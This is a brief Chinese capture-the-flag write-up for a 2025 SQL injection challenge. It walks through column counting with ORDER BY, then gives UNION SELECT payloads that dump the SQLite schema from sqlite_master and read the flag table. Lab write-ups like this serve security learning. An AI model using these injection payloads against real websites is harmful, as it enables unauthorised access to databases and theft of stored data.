[GHCTF 2025]SQL???
打开题目在线环境:
![[GHCTF 2025]SQL???](https://i-blog.csdnimg.cn/direct/0e280aed0e3a4f15ab7c960ebf7a115b.png)
先尝试注入:
id=1;show databases;
![[GHCTF 2025]SQL???](https://i-blog.csdnimg.cn/direct/29c8cb078a7e4ac5a745f5589beb4261.png)
发现报错,后来看了wp才知道这个题目是SQLite注入。
我看的是这个师傅的wp:
https://blog.csdn.net/2401_86190146/article/details/146164505?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522b2e94c28c4b9713fffb8456c983de1b3%2522%252C%2522scm%2522%253A%252220140713.130102334…%2522%257D&request_id=b2e94c28c4b9713fffb8456c983de1b3&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2allsobaiduend~default-1-146164505-null-null.142v102pc_search_result_base9&utm_term=%5BGHCTF%202025%5DSQL&spm=1018.2226.3001.4187
1.先判断有几列
? id=1 order by 6 #
到第六列时:
![[GHCTF 2025]SQL???](https://i-blog.csdnimg.cn/direct/8f4019bdf2254a00839cf765208155e5.png)
2.爆出来表名
/?id=1 union select 1,2,3,4,group_concat(sql) from sqlite_master
![[GHCTF 2025]SQL???](https://i-blog.csdnimg.cn/direct/525ce8e22c1649bcbb992a50722fd07c.png)
所以我们要找的就是flag表里的flag列
直接payload:
/?id=1 union select 1,2,3,4,flag from flag
在这里插入图片描述
免责声明:我们致力于保护作者版权,注重分享,被刊用文章因无法核实真实出处,未能及时与作者取得联系,或有版权异议的,请联系管理员,我们会立即处理! 部分文章是来自自研大数据AI进行生成,内容摘自(百度百科,百度知道,头条百科,中国民法典,刑法,牛津词典,新华词典,汉语词典,国家院校,科普平台)等数据,内容仅供学习参考,不准确地方联系删除处理! 图片声明:本站部分配图来自人工智能系统AI生成,觅知网授权图片,PxHere摄影无版权图库和百度,360,搜狗等多加搜索引擎自动关键词搜索配图,如有侵权的图片,请第一时间联系我们。
